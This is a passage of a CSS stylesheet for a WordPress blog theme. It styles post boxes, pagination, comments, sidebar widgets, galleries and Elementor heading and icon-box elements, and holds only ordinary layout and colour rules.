}
.post-box p {
  margin-bottom: 0;
}
.post-box .entry-media {
  position: relative;
}
.post-box .entry-media .post-cat {
  position: absolute;
  z-index: 1;
  bottom: -12px;
  left: 40px;
  z-index: 2;
}
.post-box .inner-post {
  padding: 38px 40px 25px;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.post-box .inner-post .post-cat {
  margin-top: -5px;
  margin-bottom: 25px;
}
.post-box .post-cat a {
  font-family: "Inter", sans-serif;
  text-transform: uppercase;
  font-size: 11px;
  font-weight: 700;
  letter-spacing: 1px;
  line-height: 1;
  display: inline-block;
  color: #fff;
  background: #fe8423;
  padding: 7px 12px 6px;
  margin-right: 6px;
  -webkit-border-radius: 12px;
  -moz-border-radius: 12px;
  border-radius: 12px;
}
.post-box .post-cat a:hover {
  background: #1b1d21;
}
.post-box .entry-meta {
  position: relative;
  text-transform: uppercase;
  font-family: "Inter", sans-serif;
  font-weight: 600;
  font-size: 13px;
  color: #818181;
  padding: 22px 40px;
  border-top: 1px solid rgba(0, 0, 0, 0.15);
}
.post-box .entry-meta > span {
  margin-right: 5px;
  display: inline-block;
}
.post-box .entry-meta a {
  color: #818181;
}
.post-box .entry-meta a:hover {
  color: #fe8423;
}
.post-box .entry-meta .btn-details {
  position: absolute;
  right: 15px;
  top: 50%;
  color: #1b1d21;
  border: 1px solid transparent;
  -webkit-transform: translateY(-50%);
  -ms-transform: translateY(-50%);
  transform: translateY(-50%);
}
.post-box .entry-meta .btn-details:hover {
  background: rgba(254, 132, 35, 0.1);
  color: #fe8423;
  border-color: #fe8423;
}
.post-box .entry-title {
  margin-bottom: 15px;
  line-height: 36px;
}
.post-box .entry-title a {
  color: #1b1d21;
  display: inline-block;
}
.post-box .entry-title a:hover {
  color: #fe8423;
}
.post-box .padding-box {
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
  padding: 30px 40px 0 40px;
  border-bottom: none;
}
.post-box .padding-box + .inner-post {
  border-top: none;
  padding-top: 30px;
}
.post-box .gallery-post.owl-carousel .owl-dots {
  bottom: 25px;
}
.post-box .gallery-post.owl-carousel .owl-dots span {
  background: #fff;
}
.post-box .gallery-post.owl-carousel .owl-dots .active {
  border-color: rgba(255, 255, 255, 0.5);
}
.post-box .audio-box {
  padding-top: 40px;
}
.post-box .audio-box iframe {
  width: 100%;
}
.post-box .link-box {
  overflow: hidden;
}
.post-box .link-box a {
  font-size: 22px;
  font-weight: 600;
  font-family: "Inter", sans-serif;
  color: #1b1d21;
}
.post-box .link-box a:hover {
  color: #fe8423;
}
.post-box .link-box i {
  color: #fe8423;
  margin-right: 15px;
  line-height: 1;
  float: left;
}
.post-box .link-box i:before {
  font-size: 35px;
}
.post-box .quote-box {
  overflow: hidden;
}
.post-box .quote-box i {
  float: left;
  color: #fe8423;
  margin-top: 5px;
}
.post-box .quote-box i:before {
  font-size: 35px;
  line-height: 1;
}
.post-box .quote-box .quote-text {
  padding-left: 52px;
  font-size: 20px;
  font-weight: 500;
  font-family: "Inter", sans-serif;
  line-height: 36px;
  color: #1b1d21;
}
.post-box .quote-box .quote-text span {
  font-size: 14px;
  font-weight: 600;
  color: #fe8423;
  text-transform: uppercase;
  display: block;
  margin-top: 5px;
}
.post-box .btn-play {
  position: absolute;
  top: 50%;
  left: 50%;
  text-align: center;
  margin-top: -30px;
  margin-left: -30px;
}
.post-box .btn-play i {
  position: relative;
  z-index: 1;
  display: block;
  width: 65px;
  height: 65px;
  line-height: 65px;
  color: #fff;
  border: 1px solid #fff;
  cursor: pointer;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
  -webkit-border-radius: 50%;
  -moz-border-radius: 50%;
  border-radius: 50%;
}
.post-box .btn-play i:before {
  margin-left: 6px;
  font-size: 21px;
}
.post-box .btn-play:hover i {
  background: #fe8423;
  border-color: #fe8423;
}

.page-pagination {
  margin-top: 60px;
  margin-bottom: 0;
}
.page-pagination li {
  display: inline-block;
}
.page-pagination li a, .page-pagination li span {
  font-family: "Inter", sans-serif;
  font-size: 16px;
  color: #1b1d21;
  background: #fff;
  font-weight: 700;
  height: 40px;
  width: 40px;
  display: block;
  text-align: center;
  line-height: 40px;
  margin-right: 5px;
  border: 1px solid #e7e7e7;
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  border-radius: 3px;
}
.page-pagination li a i:before, .page-pagination li span i:before {
  font-size: 16px;
}
.page-pagination li span, .page-pagination li a:hover {
  background: #fe8423;
  color: #fff;
  border-color: #fe8423;
}

/* blog post */
.blog-post {
  box-shadow: none;
  overflow: inherit;
  margin-bottom: 0;
}
.blog-post.format-standard .no-ptop {
  padding-top: 0;
}
.blog-post > .inner-post {
  padding-left: 0;
  padding-right: 0;
  border: none;
}
.blog-post > .inner-post p:not(:last-child) {
  margin-bottom: 20px;
}
.blog-post > .inner-post .entry-header .entry-meta {
  padding: 0;
  border: none;
  margin-bottom: 12px;
}
.blog-post > .inner-post .entry-summary {
  padding-bottom: 50px;
  overflow: hidden;
}
.blog-post .padding-box {
  padding-top: 0;
  padding-left: 0;
  padding-right: 0;
  border: none;
}
.blog-post .tagcloud {
  margin: 2px -3px 0;
  float: left;
}
.blog-post .tagcloud a {
  color: #717171;
  background: #f5f5f5;
  font-size: 12px !important;
  font-family: "Inter", sans-serif;
  text-transform: uppercase;
  font-weight: 600;
  padding: 8px 12px;
  margin: 0 3px;
  margin-bottom: 10px;
  line-height: 1;
  display: inline-block;
  vertical-align: middle;
  border: 1px solid transparent;
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  border-radius: 3px;
}
.blog-post .tagcloud a:hover {
  background: rgba(254, 132, 35, 0.1);
  color: #fe8423;
  border-color: #fe8423;
}
.blog-post .share-post {
  margin: 0 -5px;
  margin-bottom: 40px;
  float: right;
}
.blog-post .share-post a {
  display: inline-block;
  height: 30px;
  width: 30px;
  line-height: 30px;
  font-size: 12px;
  text-align: center;
  -webkit-border-radius: 19px;
  -moz-border-radius: 19px;
  border-radius: 19px;
  background: #fe8423;
  color: #fff;
  margin: 0 5px;
  transition: all 0.4s ease-in-out;
  -webkit-transition: all 0.4s ease-in-out;
  -moz-transition: all 0.4s ease-in-out;
  -o-transition: all 0.4s ease-in-out;
  -ms-transition: all 0.4s ease-in-out;
}
.blog-post .share-post a:hover {
  -webkit-transform: translateY(-5px);
  -ms-transform: translateY(-5px);
  transform: translateY(-5px);
}
.blog-post .share-post a.face {
  background: #4661c5;
}
.blog-post .share-post a.twit {
  background: #44b1e4;
}
.blog-post .share-post a.pint {
  background: #ff2e2e;
}
.blog-post .share-post a.linked {
  background: #0073B0;
}
.blog-post .share-post a.google {
  background: #DC4A38;
}
.blog-post .share-post a.tumblr {
  background: #3C586D;
}
.blog-post .share-post a.reddit {
  background: #FD4507;
}
.blog-post .share-post a.vk {
  background: #5082B9;
}
.blog-post .author-bio {
  overflow: hidden;
  background: #f5f5f5;
  padding: 40px;
  margin-bottom: 45px;
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
}
.blog-post .author-bio .author-image {
  float: left;
  margin-right: 40px;
}
.blog-post .author-bio .author-image img {
  -webkit-border-radius: 50%;
  -moz-border-radius: 50%;
  border-radius: 50%;
}
.blog-post .author-bio .author-info .title {
  font-weight: 600;
  font-size: 14px;
  text-transform: uppercase;
  margin-bottom: 3px;
}
.blog-post .author-bio .author-info h6 {
  margin-bottom: 15px;
  font-size: 18px;
}
.blog-post .author-bio .author-info .des {
  margin-bottom: 12px;
  line-height: 30px;
}
.blog-post .author-bio .author-info .author-socials a {
  font-size: 14px;
  margin-right: 15px;
  color: #939393;
}
.blog-post .author-bio .author-info .author-socials a:hover {
  color: #fe8423;
}
.blog-post:hover {
  box-shadow: none;
}

.drop-cap {
  font-family: "Inter", sans-serif;
  float: left;
  text-align: center;
  background: #1b1d21;
  color: #fff;
  width: 40px;
  height: 40px;
  line-height: 1;
  margin: 5px 15px 0 0 !important;
  border: 1px solid #e7e7e7;
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  border-radius: 3px;
}
.drop-cap span {
  font-size: 20px;
  line-height: 38px;
  display: block;
  font-weight: 800;
}

.post-nav {
  font-family: "Inter", sans-serif;
  margin-bottom: 30px;
  overflow: hidden;
  padding-bottom: 5px;
}
.post-nav > div {
  position: relative;
  float: left;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.post-nav > div .thumb-post img {
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
  width: 70px;
}
.post-nav > div .thumb-post:before {
  position: absolute;
  top: 0;
  font-family: "Flaticon";
  font-size: 21px;
  color: #fff;
  background: #fe8423;
  height: 70px;
  width: 70px;
  line-height: 70px;
  padding: 0 7px;
  text-align: center;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
  z-index: 2;
  opacity: 0;
}
.post-nav a {
  position: relative;
  display: flex;
  align-items: center;
  line-height: 1;
  min-height: 70px;
}
.post-nav a:hover .thumb-post:before {
  opacity: 1;
}
.post-nav .info-post {
  max-width: 210px;
}
.post-nav .info-post h6 {
  font-size: 16px;
  line-height: 24px;
  font-weight: 500;
  margin-bottom: 6px;
  margin-top: -5px;
}
.post-nav .info-post span {
  display: inline-block;
  font-size: 13px;
  line-height: 1;
  font-weight: 500;
  text-transform: uppercase;
  color: #818181;
}
.post-nav .post-prev {
  float: left;
}
.post-nav .post-prev .thumb-post {
  margin-right: 25px;
}
.post-nav .post-prev .thumb-post:before {
  content: "";
}
.post-nav .post-prev.not-thumb .thumb-post {
  margin-right: 95px;
}
.post-nav .post-prev.not-thumb .thumb-post:before {
  opacity: 1;
  background: #dbdbdb;
}
.post-nav .post-prev.not-thumb a:hover .thumb-post:before {
  background: #fe8423;
}
.post-nav .post-next {
  text-align: right;
  float: right;
}
.post-nav .post-next .thumb-post {
  order: 2;
  margin-left: 25px;
}
.post-nav .post-next .thumb-post:before {
  content: "";
  right: 0;
}
.post-nav .post-next.not-thumb .thumb-post {
  margin-left: 95px;
}
.post-nav .post-next.not-thumb .thumb-post:before {
  opacity: 1;
  background: #dbdbdb;
}
.post-nav .post-next.not-thumb a:hover .thumb-post:before {
  background: #fe8423;
}

.related-posts {
  margin-top: 90px;
  margin-bottom: 20px;
}
.related-posts h4 {
  margin-bottom: 32px;
}
.related-posts .entry-title {
  margin-bottom: 0;
}
.related-posts .post-box .post-inner {
  margin-bottom: 0;
}
.related-posts .inner-post {
  padding: 30px 30px 23px;
}
.related-posts .entry-media .post-cat {
  margin: 0;
}
.related-posts .entry-meta .byline {
  display: none;
}

@keyframes circle-fade-before {
  0% {
    transform: scale(1);
    opacity: 1;
  }
  100% {
    transform: scale(1.8);
    opacity: 0;
  }
}
@keyframes circle-fade-after {
  0% {
    transform: scale(1);
    opacity: 1;
  }
  100% {
    transform: scale(2.5);
    opacity: 0;
  }
}
@media (max-width: 991px) {
  .content-area.col-md-9 {
    margin-bottom: 60px;
  }

  .post-box.post-item {
    margin-bottom: 40px;
  }
}
@media only screen and (max-width: 768px) {
  .blog-post .author-bio .author-image {
    display: none;
  }

  .post-nav {
    display: none;
  }
}
@media only screen and (max-width: 600px) {
  blockquote {
    font-size: 20px;
  }

  .single-post .entry-content {
    padding: 50px 0 70px;
  }

  .blog-list .post-box .inner-post {
    padding: 30px;
  }

  .post-box .entry-title {
    font-size: 22px;
    line-height: 30px;
  }
}
/**theme check**/
.blocks-gallery-caption {
  margin-bottom: 15px;
}

.wp-block-cover-image.alignleft,
.wp-block-cover-image.alignright,
.wp-block-cover.alignleft,
.wp-block-cover.alignright {
  margin-top: 7px;
  margin-bottom: 26px;
}

.page-links {
  clear: both;
  padding-top: 25px;
  font-weight: 600;
  color: #1b1d21;
}

.page-links a {
  color: #1b1d21;
}

.page-links a:hover {
  text-decoration: underline;
}

.page-links span,
.page-links a {
  display: inline-block;
  margin-left: 7px;
}

.page-links-title {
  font-weight: 500;
}

.page-links > span:not(.page-links-title) {
  color: #888;
}

.post-password-form input[type=password] {
  padding-left: 20px;
  padding-right: 20px;
  border: 1px solid rgba(0, 0, 0, 0.1);
}

.post-password-form input[type=submit] {
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
  border-radius: none;
  -webkit-border-radius: none;
  -moz-border-radius: none;
  font-size: 16px;
  padding: 10px 15px;
  line-height: 1.42857143;
  display: inline-block;
  margin-bottom: 0;
  text-decoration: none;
  white-space: nowrap;
  vertical-align: middle;
  font-weight: 600;
  text-transform: capitalize;
  text-align: center;
  background: #1a1a1a;
  cursor: pointer;
  border: 1px solid #1a1a1a;
  color: #fff;
  outline: none;
  min-width: 122px;
  font-family: "Titillium Web", sans-serif;
}

.post-password-form input[type=submit]:hover {
  background: transparent;
  color: #1a1a1a;
}

.sticky .post-inner {
  background: #1a1b1e;
  color: #fff;
}

.sticky .post-cat a {
  background: #fff;
  color: #1a1a1a;
}

.sticky .post-cat a:hover {
  background: #eee;
}

.sticky .inner-post .entry-meta {
  color: #ccc;
}

.post-box.sticky .entry-meta a {
  color: #bbb;
}

.post-box.sticky .entry-footer .btn-details {
  color: #fff;
}

.sticky .btn-details:before {
  background: #666;
}

.post-box.sticky .entry-meta a:hover {
  color: #fff;
}

.post-box.sticky .entry-footer .btn-details:hover {
  color: #fff;
}

.sticky .inner-post .entry-title a {
  color: #fff;
}

/*--------------------------------------------------------------
## Comments
--------------------------------------------------------------*/
.comments-area {
  margin-top: 50px;
}
.comments-area ol, .comments-area ul {
  list-style: none;
  padding-left: 0;
}
.comments-area ol .comment-respond, .comments-area ul .comment-respond {
  margin-top: -30px;
  margin-bottom: 40px;
}
.comments-area .comments-title {
  margin-bottom: 35px;
}
.comments-area .comment-item {
  margin-bottom: 50px;
  overflow: hidden;
}
.comments-area .comment-item .gravatar {
  float: left;
}
.comments-area .comment-item .gravatar img {
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
}
.comments-area .comment-item .comment-content:not(.pingback) {
  padding-left: 110px;
}
.comments-area .comment-item .comment-meta {
  position: relative;
}
.comments-area .comment-item .comment-meta .comment-author {
  text-transform: capitalize;
  margin-bottom: 7px;
  font-size: 18px;
  font-weight: 600;
}
.comments-area .comment-item .comment-meta .comment-time {
  display: block;
  color: #bdbdbd;
  font-family: "Inter", sans-serif;
  font-size: 12px;
  font-weight: 600;
  text-transform: uppercase;
  letter-spacing: 0.5px;
  margin-bottom: 7px;
}
.comments-area .comment-item .comment-meta .comment-reply-link {
  position: absolute;
  top: 0;
  right: 0;
  font-family: "Inter", sans-serif;
  font-size: 14px;
  font-weight: 600;
  text-transform: uppercase;
  color: #fe8423;
}
.comments-area .comment-item .comment-meta .comment-reply-link:before {
  content: "";
  font-family: "Flaticon";
  margin-right: 10px;
  opacity: 0;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.comments-area .comment-item .comment-meta .comment-reply-link:hover:before {
  opacity: 1;
}
.comments-area .comment-item .comment-text p {
  margin-bottom: 15px;
}
.comments-area ul.children {
  padding-left: 60px;
}

.comment-respond {
  padding: 55px 60px;
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
  box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -webkit-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -moz-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
}
.comment-respond .comment-reply-title {
  margin-bottom: 10px;
  margin-top: -5px;
}
.comment-respond .comment-reply-title small {
  font-size: 16px;
  font-weight: 400;
  text-transform: lowercase;
  margin-left: 5px;
}
.comment-respond .comment-reply-title small a {
  color: #ad1010;
}
.comment-respond .comment-reply-title small a:hover {
  color: #fe8423;
}

.comment-form .row {
  margin-left: -5px;
  margin-right: -5px;
}
.comment-form .row .col-md-6 {
  padding: 0 5px;
}
.comment-form p {
  margin-bottom: 10px;
  line-height: 1;
}
.comment-form p label {
  margin-left: 8px;
}
.comment-form p.form-submit {
  margin-top: 10px;
  margin-bottom: 0;
}
.comment-form p.comment-form-cookies-consent {
  line-height: 22px;
  font-size: 14px;
}
.comment-form .comment-notes {
  margin-bottom: 36px;
}
.comment-form .logged-in-as {
  font-family: "Inter", sans-serif;
  font-size: 14px;
  margin-bottom: 35px;
}
.comment-form .logged-in-as a {
  color: #6d6d6d;
}
.comment-form .logged-in-as a:hover {
  color: #fe8423;
}
.comment-form input[type=text],
.comment-form input[type=email] {
  width: 100%;
}

@media only screen and (max-width: 768px) {
  .comment-respond {
    padding: 30px;
  }
  .comment-respond .comment-reply-title {
    font-size: 30px;
  }

  .comments-area ul.children {
    padding-left: 30px;
  }

  .comment-form .octf-btn {
    font-size: 12px;
    padding: 10px 23px;
  }
}
/*--------------------------------------------------------------
## Widgets
--------------------------------------------------------------*/
.widget ul {
  list-style: none;
  padding-left: 0;
  margin-bottom: 0;
}
.widget ul li {
  position: relative;
}
.widget .tagcloud {
  margin: 0 -3px -10px;
}
.widget .tagcloud a {
  color: #717171;
  background: #f5f5f5;
  font-size: 12px !important;
  font-family: "Inter", sans-serif;
  text-transform: uppercase;
  font-weight: 600;
  padding: 8px 12px;
  margin: 0 3px;
  margin-bottom: 10px;
  line-height: 1;
  display: inline-block;
  vertical-align: middle;
  border: 1px solid transparent;
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  border-radius: 3px;
}
.widget .tagcloud a:hover {
  background: rgba(254, 132, 35, 0.1);
  color: #fe8423;
  border-color: #fe8423;
}
.widget table {
  font-family: "Inter", sans-serif;
}
.widget table td#today {
  font-weight: 600;
  color: #1b1d21;
}

.widget-area .widget {
  margin-bottom: 45px;
}
.widget-area .widget:last-child {
  margin-bottom: 0;
}
.widget-area .widget .widget-title {
  padding-bottom: 18px;
  margin-bottom: 35px;
  border-bottom: 1px solid rgba(0, 0, 0, 0.15);
  position: relative;
}
.widget-area .widget .widget-title:before {
  content: "";
  position: absolute;
  right: 0;
  bottom: -2px;
  width: 40px;
  height: 3px;
  background: #fe8423;
  z-index: 2;
}
.widget-area .widget .widget-title:after {
  content: "";
  position: absolute;
  right: 0;
  bottom: -2px;
  width: 57px;
  height: 3px;
  background: #fff;
  z-index: 1;
}
.widget-area .widget ul:not(.recent-news) > li {
  font-size: 14px;
  position: relative;
  margin-bottom: 11px;
  line-height: 24px;
}
.widget-area .widget ul:not(.recent-news) > li:last-child {
  margin-bottom: 0;
}
.widget-area .widget ul:not(.recent-news) > li a {
  font-weight: 600;
  color: #1b1d21;
  display: inline-block;
  position: relative;
  transition: all 0.35s linear;
  -webkit-transition: all 0.35s linear;
  -moz-transition: all 0.35s linear;
  -o-transition: all 0.35s linear;
  -ms-transition: all 0.35s linear;
}
.widget-area .widget ul:not(.recent-news) > li a:hover {
  color: #fe8423;
}
.widget-area .widget ul:not(.recent-news) > li .posts-count {
  font-size: 14px;
  font-weight: 600;
  color: #8a8a8a;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.widget-area .widget ul:not(.recent-news) > li.recentcomments a:before {
  display: none;
}
.widget-area .widget select {
  width: 100%;
  padding: 8px;
  outline: none;
}
.widget-area .widget table caption {
  margin-bottom: 10px;
}
.widget-area .widget table td, .widget-area .widget table th {
  border-color: #aaa;
  text-align: center;
}
.widget-area .widget_categories ul li a,
.widget-area .widget_product_categories ul li a,
.widget-area .widget_archive ul li a {
  text-transform: uppercase;
  color: #1b1d21;
  display: inline-block;
  padding-left: 15px;
  position: relative;
  font-size: 13px;
  font-weight: 600;
  transition: all 0.35s linear;
  -webkit-transition: all 0.35s linear;
  -moz-transition: all 0.35s linear;
  -o-transition: all 0.35s linear;
  -ms-transition: all 0.35s linear;
}
.widget-area .widget_categories ul li a:before,
.widget-area .widget_product_categories ul li a:before,
.widget-area .widget_archive ul li a:before {
  content: "";
  position: absolute;
  left: 0;
  top: calc(50% - 2.5px);
  width: 5px;
  height: 5px;
  background: #fe8423;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
  -webkit-border-radius: 50%;
  -moz-border-radius: 50%;
  border-radius: 50%;
}
.widget-area .widget_categories ul li a + span,
.widget-area .widget_product_categories ul li a + span,
.widget-area .widget_archive ul li a + span {
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.widget-area .widget_categories ul li a:hover + span.posts-count,
.widget-area .widget_product_categories ul li a:hover + span.posts-count,
.widget-area .widget_archive ul li a:hover + span.posts-count {
  color: #fe8423;
}

.widget .recent-news li:not(:last-child) {
  margin-bottom: 25px;
}
.widget .recent-news .thumb {
  float: left;
  margin-right: 20px;
  width: 75px;
  overflow: hidden;
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
}
.widget .recent-news h6 {
  margin-bottom: 10px;
  line-height: 24px;
  font-size: 15px;
  font-weight: 500;
}
.widget .recent-news h6 a {
  color: #1b1d21;
}
.widget .recent-news .post-on {
  font-family: "Inter", sans-serif;
  font-size: 13px;
  font-weight: 600;
  display: block;
  line-height: 1;
  text-transform: uppercase;
  color: #9f9e9e;
}

.search-form {
  position: relative;
}
.search-form .search-field {
  width: 100%;
  padding: 0 60px 0 20px;
  height: 48px;
  line-height: 1;
  border-color: #dbdbdb;
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  border-radius: 3px;
}
.search-form .search-submit {
  border: none;
  position: absolute;
  top: 4px;
  right: 4px;
  height: 100%;
  width: 40px;
  height: 40px;
  outline: none;
  text-align: center;
  vertical-align: middle;
  color: #666666;
  background: #fe8423;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  border-radius: 3px;
}
.search-form .search-submit i {
  color: #fff;
}
.search-form .search-submit i:before, .search-form .search-submit i:after {
  font-size: 21px;
}
.search-form .search-submit:hover {
  background: #1b1d21;
}

.author-widget_wrapper {
  position: relative;
  padding: 30px;
  background-position: center center;
  background-size: cover;
  background-repeat: no-repeat;
  overflow: hidden;
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
  box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -webkit-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -moz-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
}
.author-widget_wrapper .author-widget_image-wrapper {
  margin-bottom: 22px;
}
.author-widget_wrapper .author-widget_image-wrapper img {
  width: 150px;
}
.author-widget_wrapper .author-widget_title {
  margin-bottom: 10px;
}
.author-widget_wrapper .author-widget_text {
  font-size: 14px;
  line-height: 28px;
  margin-bottom: 20px;
}
.author-widget_wrapper:before {
  content: "";
  position: absolute;
  top: -10px;
  left: 31px;
  width: 80%;
  height: 113%;
  background-image: linear-gradient(230deg, #fe8423 -150%, #fff 80%);
  z-index: -1;
  -webkit-transform: rotate(35deg) translateY(-14%) translateX(22%);
  -ms-transform: rotate(35deg) translateY(-14%) translateX(22%);
  transform: rotate(35deg) translateY(-14%) translateX(22%);
}

.author-widget_social a {
  display: inline-block;
  font-size: 12px;
  text-align: center;
  height: 28px;
  width: 28px;
  line-height: 28px;
  cursor: pointer;
  margin-right: 7px;
  background: #1b1d21;
  color: #fff;
  -webkit-border-radius: 50%;
  -moz-border-radius: 50%;
  border-radius: 50%;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.author-widget_social a:last-child {
  margin-right: 0px;
}
.author-widget_social a:hover {
  background: #fe8423;
}
.author-widget_social a * {
  color: #fff;
}

/*--------------------------------------------------------------
## Responsive Blog
--------------------------------------------------------------*/
/*--------------------------------------------------------------
# Infinite scroll
--------------------------------------------------------------*/
/* Globally hidden elements when Infinite Scroll is supported and in use. */
.infinite-scroll .posts-navigation,
.infinite-scroll.neverending .site-footer {
  /* Theme Footer (when set to scrolling) */
  display: none;
}

/* When Infinite Scroll has reached its end we need to re-display elements that were hidden (via .neverending) before. */
.infinity-end.neverending .site-footer {
  display: block;
}

/*--------------------------------------------------------------
# Media
--------------------------------------------------------------*/
.page-content .wp-smiley,
.entry-content .wp-smiley,
.comment-content .wp-smiley {
  border: none;
  margin-bottom: 0;
  margin-top: 0;
  padding: 0;
}

/* Make sure embeds and iframes fit their containers. */
embed,
iframe,
object {
  max-width: 100%;
}

/* Make sure logo link wraps around logo image. */
.custom-logo-link {
  display: inline-block;
}

/*--------------------------------------------------------------
## Captions
--------------------------------------------------------------*/
.wp-caption {
  margin-bottom: 1.5em;
  max-width: 100%;
}
.wp-caption img[class*=wp-image-] {
  display: block;
  margin-left: auto;
  margin-right: auto;
}
.wp-caption .wp-caption-text {
  margin: 0.8075em 0;
}

.wp-caption-text {
  text-align: center;
}

.bypostauthor {
  color: inherit;
}

/*--------------------------------------------------------------
## Galleries
--------------------------------------------------------------*/
.gallery-caption {
  display: block;
}

.gallery {
  margin-bottom: 1.5em;
  margin-left: -7px;
  margin-right: -7px;
}

.gallery-item {
  display: inline-block;
  text-align: center;
  vertical-align: top;
  width: 100%;
  margin: 0;
  padding: 7px;
}

.gallery-columns-2 .gallery-item {
  max-width: 50%;
}

.gallery-columns-3 .gallery-item {
  max-width: 33.33%;
}

.gallery-columns-4 .gallery-item {
  max-width: 25%;
}

.gallery-columns-5 .gallery-item {
  max-width: 20%;
}

.gallery-columns-6 .gallery-item {
  max-width: 16.66%;
}

.gallery-columns-7 .gallery-item {
  max-width: 14.28%;
}

.gallery-columns-8 .gallery-item {
  max-width: 12.5%;
}

.gallery-columns-9 .gallery-item {
  max-width: 11.11%;
}

.gallery-columns-6 .gallery-caption,
.gallery-columns-7 .gallery-caption,
.gallery-columns-8 .gallery-caption,
.gallery-columns-9 .gallery-caption {
  display: none;
}

/*--------------------------------------------------------------
# Elementor Widgets
--------------------------------------------------------------*/
/*--------------------------------------------------------------
## Heading
--------------------------------------------------------------*/
.ot-heading {
  font-family: "Inter", sans-serif;
}
.ot-heading > span {
  position: relative;
  display: inline-block;
  font-size: 11px;
  font-weight: 700;
  text-transform: uppercase;
  color: #fe8423;
  margin-bottom: 10px;
}
.ot-heading > span.is_highlight {
  background: rgba(254, 132, 35, 0.1);
  padding: 2px 10px;
  border: 1px solid #fe8423;
  -webkit-border-radius: 15px;
  -moz-border-radius: 15px;
  border-radius: 15px;
}
.ot-heading > span.is_line {
  padding-left: 60px;
}
.ot-heading > span.is_line:before {
  content: "";
  position: absolute;
  left: 0;
  bottom: 50%;
  width: 45px;
  height: 1px;
  background: #fe8423;
}
.ot-heading .main-head {
  margin-bottom: 0;
}

/*--------------------------------------------------------------
## Icon Box
--------------------------------------------------------------*/
.icon-box {
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.icon-box .icon-main {
  display: inline-block;
  color: #fe8423;
  width: 90px;
  height: 90px;
  line-height: 90px;
  text-align: center;
  margin-bottom: 17px;
  -webkit-border-radius: 50%;
  -moz-border-radius: 50%;
  border-radius: 50%;
}
.icon-box .icon-main i {
  line-height: 90px;
  font-size: 40px;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.icon-box .icon-main svg {
  vertical-align: middle;
  width: 40px;
  fill: #fe8423;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.icon-box .title-box {
  font-size: 20px;
  margin-bottom: 15px;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.icon-box .title-box a {
  color: #1b1d21;
}
.icon-box p:last-child {
  margin-bottom: 0;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.icon-box .link-details {
  margin-top: 18px;
}

/* icon box 1*/
.icon-box-1 {
  position: relative;
  padding: 48px 35px 40px;
  box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -webkit-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
